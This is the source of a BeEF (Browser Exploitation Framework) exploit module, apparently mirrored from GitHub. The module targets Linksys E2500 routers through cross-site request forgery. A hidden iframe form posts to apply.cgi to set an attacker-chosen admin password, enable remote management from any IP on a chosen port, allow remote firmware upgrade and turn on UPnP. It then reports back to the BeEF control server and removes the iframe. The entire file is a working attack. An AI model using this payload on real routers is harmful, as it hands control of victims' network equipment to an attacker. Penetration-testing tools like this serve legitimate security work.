Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/router/linksys_e2500_csrf/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
beef.execute(function() {

8
  var port    = '<%= @port %>';

9
  var gateway = '<%= @base %>'; 

10
  var passwd  = '<%= @password %>';

11
  var timeout = 15;

12


13
  var e2500_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", "application/x-www-form-urlencoded",

14
       [{'type':'hidden', 'name':'submit_button', 'value':'Management'} ,

15
       {'type':'hidden', 'name':'change_action', 'value':''},

16
       {'type':'hidden', 'name':'action', 'value':'Apply'},

17
       {'type':'hidden', 'name':'PasswdModify', 'value':'1'},

18
       {'type':'hidden', 'name':'http_enable', 'value':'1'},

19
       {'type':'hidden', 'name':'https_enable', 'value':'0'},

20
       {'type':'hidden', 'name':'ctm404_enable', 'value':''},

21
       {'type':'hidden', 'name':'remote_mgt_https', 'value':'1'},

22
       {'type':'hidden', 'name':'wait_time', 'value':'4'},

23
       {'type':'hidden', 'name':'need_reboot', 'value':'0'},

24
       {'type':'hidden', 'name':'http_passwd', 'value':passwd},

25
       {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},

26
       {'type':'hidden', 'name':'_http_enable', 'value':'1'},

27
       {'type':'hidden', 'name':'_https_enable', 'value':'0'},

28
       {'type':'hidden', 'name':'web_wl_filter', 'value':'0'},

29
       {'type':'hidden', 'name':'remote_management', 'value':'1'},

30
       {'type':'hidden', 'name':'_remote_mgt_https', 'value':'0'},

31
       {'type':'hidden', 'name':'remote_upgrade', 'value':'1'},

32
       {'type':'hidden', 'name':'remote_ip_any', 'value':'1'},

33
       {'type':'hidden', 'name':'http_wanport', 'value':port},

34
       {'type':'hidden', 'name':'nf_alg_sip', 'value':'0'},

35
       {'type':'hidden', 'name':'upnp_enable', 'value':'1'},

36
       {'type':'hidden', 'name':'upnp_config', 'value':'1'},

37
       {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'}

38
      ]);

39
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

40


41
  cleanup = function() {

42
    document.body.removeChild(e2500_iframe_<%= @command_id %>);

43
  }

44
  setTimeout("cleanup()", timeout*1000);

45


46
});

47


48


49